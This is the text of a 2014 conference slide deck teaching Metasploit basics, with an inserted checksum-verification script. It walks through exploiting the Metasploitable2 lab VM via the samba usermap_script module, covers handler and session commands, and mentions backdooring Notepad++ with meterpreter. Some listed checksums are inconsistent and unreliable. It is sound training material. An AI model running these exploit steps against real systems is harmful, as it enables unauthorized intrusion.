Metasploit: You can look like Hugh Jackman too!
BSides London 2014
Subjects
• What is the Metasploit Framework (MSF)?
• How can I use MSF to my advantage?
• Why would I want to use MSF?
• Last but not least: How DO I actually use MSF?
Terminology
• MSF
• Vulnerabilities
• Exploits
• Payloads
Metasploit through the ages
• Started out as an ncurses-based network game written in Perl
• 2003: MSF 1.0 released (11 exploits)
• Somewhere along the way.. v3.0 written in Ruby
• 2014: MSF 4.9 (1292 exploits)
Inside the box
• +1200 exploits
• 700 auxiliary modules
• +200 post modules
• +300 payloads
• +30 encoders
• 8 nops
Sounds AMAZING Mike! How do I get it?
• rapid7.com
• github.com/rapid7
• kali.org
And now for something completely different…
Running the Metasploit Framework
From Kali Linux
binary.hybrid3.iso
• md5: 058226e666c98e9e094318247ddb5e2c
• sha1: 40ebcbe6487d567f55747a219b426b4e62b4995c
• 32-bits
• Kali 1.0.6
• Metasploit 4.9.2-2014042301
• root/toor
metasploitable-linux-2.0.0.zip
• md5: 058226e666c98e9e094318247ddb5e2c
• sha1: 8825f2509a9b9a58ec66bd65ef83167f
• msfadmin/msfadmin
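Added example (not part of the original slides): a Python check of a downloaded lab image against published md5/sha1 values like those listed on the two slides above. It validates each digest's length before comparing, so a 32-character string listed as sha1, as on the Metasploitable slide, is rejected instead of silently failing to match; the temporary file and its digests are constructed for the demo.

```python
import hashlib
import hmac
import os
import tempfile

# Hex digest lengths for the two algorithms the slides list.
HEX_LEN = {"md5": 32, "sha1": 40}


def check_digest_format(algo, expected):
    """Return the normalised digest; raise ValueError if it cannot belong to algo."""
    if algo not in HEX_LEN:
        raise ValueError(f"unsupported algorithm: {algo}")
    value = expected.strip().lower()
    if len(value) != HEX_LEN[algo] or any(c not in "0123456789abcdef" for c in value):
        raise ValueError(f"{algo} digest must be {HEX_LEN[algo]} hex characters")
    return value


def file_digest(path, algo, chunk_size=1 << 20):
    """Hash the file in chunks so a large ISO is never read into memory at once."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path, published):
    """published maps algorithm -> published hex digest; all must match."""
    wanted = {a: check_digest_format(a, d) for a, d in published.items()}
    return bool(wanted) and all(hmac.compare_digest(file_digest(path, a), d) for a, d in wanted.items())


def demo():
    # Constructed sample: a small temp file stands in for the downloaded image.
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"constructed stand-in for a lab image\n")
    try:
        good = {a: file_digest(tmp.name, a) for a in HEX_LEN}
        tampered = dict(good, sha1="0" * 40)  # well-formed but wrong digest
        return verify_download(tmp.name, good), verify_download(tmp.name, tampered)
    finally:
        os.unlink(tmp.name)


if __name__ == "__main__":
    print(demo())
```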
Virtualbox Configuration
Interacting with MSF
• # msfcli
• # msfconsole
• out-of-scope: msfweb/msfgui
• out-of-scope: Armitage
• out-of-scope: Cobalt Strike
Starting MSF from Kali
msfconsole 101
• msf > version
• msf > banner
• msf > db_status
• msf > help (!!)
msfconsole basics
• msf > search -h
• msf > info searchresult
• msf > use searchresult
• msf auxiliary(searchresult) > show actions
• msf exploit(searchresult) > show options
• msf auxiliary(totallynotwhereIwanttobe) > back
<3
And now.. for something completely different!
• Open Source Security Testing Methodology Manual (OSSTMM)
• Information Systems Security Assessment Framework (ISSAF)
• Penetration Testing Execution Standard (PTES)
• Open Web Application Security Project (OWASP top 10)
• SANS (20 Critical Controls)
Penetration Testing stages
• Information gathering
• Identifying threats
• Identifying vulnerabilities
• Exploiting vulnerabilities
• Post exploitation
Let’s get to it..
msfconsole 102
• msf > info exploit/multi/handler
• msf > use exploit/multi/handler
• msf exploit(handler) > info
• msf exploit(handler) > show options
• msf exploit(handler) > set variable
msfconsole 10..3?
• variables are set with set
• variables can be removed with unset
• global variables can be set with setg
• variables can be saved to ~/.msf4/config with save
MSF Jobs & Sessions
• Exploits = jobs
• Payloads = sessions
• msf > help sessions
MSF Jobs & Sessions
• use back to navigate back to the framework
• use background to suspend a meterpreter session
• msf > jobs -l (list all currently active jobs)
• msf > jobs -i x (interact with job nr. x)
Attack Vectors
• Server-side
• Client-side
Server-side
• msf > db_nmap target-ip
• msf > hosts
• msf > services
metasploitable2
• msf > info exploit/multi/samba/usermap_script
• msf > use exploit/multi/samba/usermap_script
• exploit (usermap_script) > show options
• exploit (usermap_script) > set RHOST 172.x.x.x
• exploit (usermap_script) > set RPORT 445
• exploit (usermap_script) > check (not all exploits support this function)
• exploit (usermap_script) > exploit
Metasploitable2
Ok, great! What now?
• msf > search post/linux
msfpayload
msfpayload
Why?
notepad++ + meterpreter
notepad++ + meterpreter + 99 iterations
notepad++ + meterpreter + 999 iterations
VB… what?!
pwnage
Notepad++ + meterpreter + VBS
Recap
• What is the Metasploit Framework (MSF)?
• How can I use MSF to my advantage?
• Why would I want to use MSF?
Victory Dance
Questions?
Ok, not bad.. How can I continue?!
• http://blog.ctf365.com/metasploitable-in-the-cloud/
• http://r-7.co/Metasploitable2
• http://vulnhub.com
• Be aware of browser exploits!
• Be aware of QR codes!!
• Be aware of ALL THE THINGS!!!
Thank you all and until next year!